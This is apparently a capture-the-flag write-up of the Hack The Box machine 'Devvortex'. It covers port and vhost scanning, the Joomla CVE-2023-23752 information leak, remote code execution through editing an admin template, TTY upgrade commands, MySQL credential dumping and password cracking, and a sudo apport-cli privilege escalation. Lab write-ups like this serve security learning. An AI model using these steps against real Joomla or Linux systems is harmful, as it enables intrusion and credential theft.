Port Scanning
sudo nmap -Pn -T 5 -p- -vv -sS --min-rate 5000 -oN result [IP]# Nmap 7.94 scan initiated Mon Nov 27 11:36:20 2023 as: nmap -Pn -T 5 -p- -vv -sS --min-rate 5000 -oN result 10.10.11.242
Warning: 10.10.11.242 giving up on port because retransmission cap hit (2).
Increasing send delay for 10.10.11.242 from 0 to 5 due to 2015 out of 5037 dropped probes since last increase.
Nmap scan report for 10.10.11.242
Host is up, received user-set (0.28s latency).
Scanned at 2023-11-27 11:36:20 +07 for 21s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63Web Service
After explore, I discovered that this website’s service is a static website so I will find another directory path and vhost. I detected the vhost using gobuster and the directory path using dirsearch.
In fact, you can use gobuster to find the directory path but I love to use dirsearch more. XD!!!!
Result of Dirsearch
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /Users/imbatman/Workspaces/hackthebox/devvortex/reports/http_devvortex.htb/_23-11-29_08-56-58.txt
Target: http://devvortex.htb/
[08:56:58] Starting:
[08:57:05] 301 - 178B - /js -> http://devvortex.htb/js/
[08:57:26] 200 - 7KB - /about.html
[08:58:21] 200 - 9KB - /contact.html
[08:58:23] 301 - 178B - /css -> http://devvortex.htb/css/
[08:58:40] 403 - 564B - /images/
[08:58:40] 301 - 178B - /images -> http://devvortex.htb/images/
[08:58:45] 403 - 564B - /js/
Task CompletedResult of Gobuster
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: ./SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.devvortex.htb Status: 200 [Size: 23221]
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================The result of dirsearch can make me sure about this service just static website and Yummy I found another vhost. Let’s try to play it. XD!!!!
another vhost is dev.devvortex.htb
User Flag
Using the Chrome extension Wappalyzer, I was able to determine which framework of services. The service is provided by Joomla, and I will use joomscan to check the CMS version, theme, and plugin.
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://dev.devvortex.htb ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 4.2.6
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt
Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/dev.devvortex.htb/The results of Joomscan showed a path that was discovered on robots.txt and nothing else vulnerabilities were discovered, but the version of Joomla was discovered that is of great interest. After researching Joomla 4.2.6, I have discovered a few vulnerabilities. The vulnerability is CVE-2023–23752
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered
Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false
Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: xxxxxxxxxx
DB name: joomla
DB prefix: sd4fg_
DB encryption 0I’ve obtained a list of data leaks that include users and passwords, so I’ll try to login to ssh with those credentials, but it not work, so let’s try to login on the admin page. I overlooked the path that the scanning result had informed me of.
I looked into every function of the service and, in the end, identified something that we can RCE. Just go to System > Administrator Templates > Atum Details and Files. You can view and edit the template file. I use the system command to show this vulnerability can be used to reverse shell by pinging back to my laptop. After save you must go to /administrator/templates/atum/login.php to make command to execute and Don’t forgot to use tcpdump command on your laptop
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on utun6, link-type NULL (BSD loopback), snapshot length 524288 bytes
10:05:11.750466 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 2, seq 1, length 64
10:05:11.750530 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 2, seq 1, length 64
10:05:12.458825 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 2, seq 2, length 64
10:05:12.458887 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 2, seq 2, length 64
10:05:13.458471 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 2, seq 3, length 64
10:05:13.458532 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 2, seq 3, length 64
10:07:52.782843 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 3, seq 1, length 64
10:07:52.782886 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 3, seq 1, length 64
10:07:53.779977 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 3, seq 2, length 64
10:07:53.780044 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 3, seq 2, length 64
10:07:54.799631 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 3, seq 3, length 64
10:07:54.799672 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 3, seq 3, length 64
10:09:45.292800 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 4, seq 1, length 64
10:09:45.292858 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 4, seq 1, length 64
10:09:46.209648 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 4, seq 2, length 64
10:09:46.209692 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 4, seq 2, length 64
10:09:47.210885 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 4, seq 3, length 64
10:09:47.210951 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 4, seq 3, length 64Pretty Good, that machine can ping back to my laptop, next step it’s time to reverse shell.
Next step I will upgrading simple shells to fully interactive TTYs.
# On victim
python3 -c 'import pty; pty.spawn("/bin/bash")' #
# type ctrl-Z
# In your terminal type follow by step and remember term, rows and column
echo $TERM
stty -a
# Next step is back to process that we make this to background
stty raw -echo;fg
# On victim
export TERM=[term]
stty rows [rows] columns [columns]It’s up to you to decide if you will do it or not on the previous step. In order to avoid making the same mistakes in this section, I go back and look up the joomscan scanning information. We have credential of mysql. Try to login to mysql. After login you should proof your mysql cli skill. XD!!
mysql -u lewis -p joomla --password=xxx
If you can dump the credential. Next step you must crack and login to ssh
> john hash --show
logan@devvortex.htb:xxx
Privilege Escalation
In privilege escalation I just try the basic way if you know password of user
sudo -lUser logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cliYou can use apport-cli with sudo, Let’s try to use this command.
sudo /usr/bin/apport-cli -h
We can check about version of apport-cli by use flag -v
After research I found an issue of apport on their github, and there I discovered a proof of concept for LPE. If you don’t have crash file on /var/crash you can make it with linpeas. The file name is unimportant. All crash files are usable just load a paper , type V for load a prompt and !/bin/bash
sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
Thanks you for reading, This is my first time to make WriteUp in English.
>>>>>>>>>>>>>>> “Learning By Doing ,Trial And Error” <<<<<<<<<<<<<<<<
